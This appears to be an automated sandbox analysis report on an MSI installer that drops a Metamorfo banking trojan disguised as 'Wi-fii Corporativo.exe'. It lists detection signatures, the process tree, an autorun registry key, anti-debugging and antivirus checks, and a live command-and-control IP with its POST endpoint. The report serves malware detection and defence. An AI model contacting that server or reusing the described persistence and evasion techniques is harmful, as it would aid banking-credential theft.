Edit tour

Windows Analysis Report
fiF8mxzUfw.msi

Overview

General Information

Sample name:	fiF8mxzUfw.msi renamed because original name is a hash value
Original sample name:	e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05.msi
Analysis ID:	1592145
MD5:	878933ddb3c232ad3d24df9248d143ad
SHA1:	ad166a8895b669a267f8dd05a86f373c29a2cc05
SHA256:	e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05
Tags:	bankerlatammsitrojanuser-johnk3r
Infos:

Detection

Metamorfo

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Metamorfo

AI detected suspicious sample

Creates autostart registry keys with suspicious names

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Switches to a custom stack to bypass stack traces

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7452 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7484 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7600 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673 MD5: 9D09DC1EDA745A5F87553048E57620CF)

Wi-fii Corporativo.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)

Wi-fii Corporativo.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)

WerFault.exe (PID: 4508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012 MD5: C31336C1EFC2CCB44B4326EA793040F2)

Wi-fii Corporativo.exe (PID: 5508 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)

WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Metamorfo	According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.	No Attribution	https://blog.ensilo.com/metamorfo-avast-abuser https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html https://cofense.com/blog/autohotkey-banking-trojan/ https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767	https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Metamorfo	Yara detected Metamorfo	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe, ProcessId: 7732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wi-fii Corporativo.exe

Suricata Signatures

ETPRO MALWARE Win32/Metamorfo CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T20:35:42.812878+0100	2833187	1	Malware Command and Control Activity Detected	192.168.2.5	49711	15.228.77.178	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: fiF8mxzUfw.msi	Virustotal: Detection: 13%			Perma Link
Source: fiF8mxzUfw.msi	ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll

Joe Sandbox ML: detected

Source:	Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: fiF8mxzUfw.msi, MSI2AE0.tmp.1.dr, MSI28F8.tmp.1.dr, MSI2995.tmp.1.dr, MSI2A05.tmp.1.dr, 6f262c.msi.1.dr
Source:	Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_microsoft.window_fce914e429116371317fd6ae8e3a6ad884573e_e281e47e_5794bd2b-1663-4d82-bb7e-b5838504a6be\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_5ef81f74-43b2-4a4c-9f72-dafcda16006e\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2833187 - Severity 1 - ETPRO MALWARE Win32/Metamorfo CnC Checkin : 192.168.2.5:49711 -> 15.228.77.178:80

Source: global traffic

TCP traffic: 192.168.2.5:59922 -> 162.159.36.2:53

Source: Joe Sandbox View

IP Address: 15.228.77.178 15.228.77.178

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic

HTTP traffic detected: POST /ytr/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 142Host: 15.228.77.178Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 15.228.77.178
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2

Source: unknown

Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Wi-fii Corporativo.exe, 00000007.00000002.2701399669.0000000001701000.00000020.00000001.01000000.00000004.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2712198268.000000000683F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3690828895.0000000005D7F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685884269.0000000000D71000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: Wi-fii Corporativo.exe.1.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary

PE file contains section with special chars

Source: cef_frame.dll.1.dr	Static PE information: section name: .E{7
Source: cef_frame.dll.1.dr	Static PE information: section name: .< a
Source: cef_frame.dll.1.dr	Static PE information: section name: .z}'

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f2629.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI28F8.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2995.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI29D5.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2A05.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2AE0.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{AD07A654-F9E0-4C2E-8281-C407422B8AAE}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2B8D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f262c.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f262c.msi	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI28F8.tmp

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Windows\Installer\MSI28F8.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012

Source: cef_frame.dll.1.dr

Static PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: cef_frame.dll.1.dr

Static PE information: Number of sections : 13 > 10

Source: fiF8mxzUfw.msi

Binary or memory string: OriginalFilenameAICustAct.dllF vs fiF8mxzUfw.msi

Source: classification engine

Classification label: mal96.troj.evad.winMSI@12/46@0/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML2FAF.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8156
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF55287FD11A5006EE.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fiF8mxzUfw.msi	Virustotal: Detection: 13%
Source: fiF8mxzUfw.msi	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
